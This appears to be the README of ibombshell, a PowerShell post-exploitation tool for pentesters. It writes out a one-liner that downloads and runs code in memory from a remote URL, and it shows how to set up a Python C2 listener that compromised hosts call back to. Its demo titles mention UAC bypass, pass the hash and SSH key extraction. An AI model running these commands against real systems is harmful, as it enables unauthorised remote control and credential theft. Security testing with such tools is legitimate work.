ibombshell is a tool written in Powershell that allows you to have a prompt at any time with post-exploitation functionalities (and in some cases exploitation). It is a shell that is downloaded directly to memory providing access to a large number of pentesting features. These functionalities can be downloaded directly to memory, in the form of a Powershell function. This form of execution is known as everywhere.
In addition, ibombshell provides a second execution mode called Silently, so the pentester can execute an instance of ibombshell (called warrior). The compromised computer will be connected to a C2 panel through HTTP. Therefore, it will be possible to control the warrior and be able to load functions in memory that help the pentester. This is happening whithin the post-exploitation phase.
Prerequisities
To run ibombshell everywhere it is mandatory to have PowerShell 3.0 or higher. For operating systems other than Windows you can read more about this in the PowerShell GitHub - PowerShell for every system!.
To run the ibombshell silently mode you need python 3.6 and some python libraries. You can install this with:
cd ibombshell\ c2/ pip install -r requirements.txt
Note: ibombshell C2 works in python 3.X. Make sure you run a pip relative to this version.Usage
ibombshell has two execution modes:
ibombshell everywhere
To load ibombshell simply run on PowerShell:
iex (new-object net.webclient).downloadstring(‘https://raw.githubusercontent.com/ElevenPaths/ibombshell/master/console’)
Now you can run the downloaded ibombshell console running:console
ibombshell silently mode
This version allows you to run the ibombshell console and remotely control it from the C2 panel created in python. To run this version, first you must launch the console process in powershell:
iex (new-object net.webclient).downloadstring(‘https://raw.githubusercontent.com/ElevenPaths/ibombshell/master/console’)
On ibombshell C2 path, prepare the C2:python3 ibombshell.py
And create the listener where the warriors will connected:iBombShell> load modules/listener.py [+] Loading module... [+] Module loaded! iBombShell[modules/listener.py]> run
The default listener port is 8080. Finally you can launch the console in silently mode on the host to get remote control:console -Silently -uriConsole http://[ip or domain]:[port]
ibombshell C2 scheme
The basic operation of the ibombshell control panel follows the following scheme:
ibombshell C2 | | | newibombshell | +--------------------->| --+ register | |<--+ from IP | get functions | | and instructions | +--------------------->| | | | send functions | | and instructions | execute +-- |<---------------------+ +-->| | | results | +--------------------->| | |
Docker
We have created a docker container with everything you need to make it works. Run this command from Dockerfile location.
sudo docker build -t "ibombshell" . sudo docker run -it ibombshell
Example videos
Some example videos...
iBombShell: PoC Warrior + Bypass UAC + Pass the hash
iBombShell: macOS
ibombshell: Extracting Private SSH Keys on Windows 10
iBombShell: PoC savefunctions